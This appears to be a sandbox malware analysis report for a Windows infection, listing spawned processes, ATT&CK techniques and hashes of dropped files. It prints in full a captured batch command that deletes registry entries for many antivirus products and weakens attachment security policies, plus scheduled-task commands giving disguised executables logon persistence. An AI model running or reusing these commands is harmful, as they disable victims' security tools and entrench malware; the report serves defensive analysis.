"HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
4⤵
PID:5016

C:\Users\Admin\AppData\Local\Temp\9738.exe
C:\Users\Admin\AppData\Local\Temp\9738.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2544

C:\Users\Admin\AppData\Local\Temp\9738.exe
C:\Users\Admin\AppData\Local\Temp\9738.exe
2⤵
- Executes dropped EXE
PID:5108

C:\Users\Admin\AppData\Local\Temp\9B8E.exe
C:\Users\Admin\AppData\Local\Temp\9B8E.exe
1⤵
- Executes dropped EXE
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 732
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 744
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 844
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 880
2⤵
- Program crash
PID:1796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 788
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:1800

C:\Users\Admin\AppData\Local\Temp\9E9C.exe
C:\Users\Admin\AppData\Local\Temp\9E9C.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2716

C:\Users\Admin\AppData\Local\Temp\A63E.exe
C:\Users\Admin\AppData\Local\Temp\A63E.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Users\Admin\AppData\Local\Temp\AB50.exe
C:\Users\Admin\AppData\Local\Temp\AB50.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3020

C:\Users\Admin\AppData\Local\Temp\AB50.exe
C:\Users\Admin\AppData\Local\Temp\AB50.exe
2⤵
- Executes dropped EXE
PID:4812

C:\Users\Admin\AppData\Local\Temp\AB50.exe
"C:\Users\Admin\AppData\Local\Temp\AB50.exe"
3⤵
- Executes dropped EXE
PID:4116

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:940

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3832

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3884

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4160

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4192

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4248

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4336

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "install" /sc ONLOGON /tr "'C:\ProgramData\Data\GPU\install.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Public\Videos\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.UI\SearchUI.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Windows\System32\usp10\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\regid.1991-06.com.microsoft\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\twain_32\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\WindowsPhoneReservedAppInfo\SearchUI.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\OfflineFilesConfigurationWmiProvider\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4496

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\Database.exe
MD5
30f0a5fe731fd2735b8c196fd0fe91cf

SHA1
2eb63724fd11bf8e082bcd99301654111ad0d831

SHA256
13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

SHA512
acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

Download Submit
C:\ProgramData\Data\install.exe
MD5
3319cb474eaa2f3812956b271ff29635

SHA1
74fbed926e8de14fa5eb6a5a47fb873def72fb81

SHA256
79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a

SHA512
c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347

Download Submit
C:\ProgramData\Data\install.exe
MD5
3319cb474eaa2f3812956b271ff29635

SHA1
74fbed926e8de14fa5eb6a5a47fb873def72fb81

SHA256
79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a

SHA512
c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
2c488e751cc8d933035d0f5dc398d6ef

SHA1
3e9253b08dc561926aaacc85ddb5db7e30665100

SHA256
ec17b8acb8f6608995dcff248faf23b5d972511e88319bec1be4ecf48e20b75a

SHA512
173b856c1283767e4604bfe06fba9410891173c07d8478553e2a2a972e61d668d3c922592085a2d1af47e8fe4a105caaaf197685382a317d30d307fdb46e75cb

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
2c488e751cc8d933035d0f5dc398d6ef

SHA1
3e9253b08dc561926aaacc85ddb5db7e30665100

SHA256
ec17b8acb8f6608995dcff248faf23b5d972511e88319bec1be4ecf48e20b75a

SHA512
173b856c1283767e4604bfe06fba9410891173c07d8478553e2a2a972e61d668d3c922592085a2d1af47e8fe4a105caaaf197685382a317d30d307fdb46e75cb

Download Submit
C:\ProgramData\Systemd\HostData.exe
MD5
cbf26c74a0a12b5f17ba7596ff6ad19f

SHA1
6dc733432c290f1fbf5ddda2571b7f538445202b

SHA256
095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983

SHA512
8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b

Download Submit
C:\ProgramData\Systemd\HostData.exe
MD5
cbf26c74a0a12b5f17ba7596ff6ad19f

SHA1
6dc733432c290f1fbf5ddda2571b7f538445202b

SHA256
095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983

SHA512
8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b

Download Submit
C:\ProgramData\Systemd\config.json
MD5
a285ac140c8c6806223bfdc02302173e

SHA1
06ca61cae058c568860858e49615d04dc4a8820d

SHA256
36d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb

SHA512
f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
c558fdaa3884f969f1ec904ae7bbd991

SHA1
b4f85d04f6bf061a17f52c264c065b786cfd33ff

SHA256
3e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e

SHA512
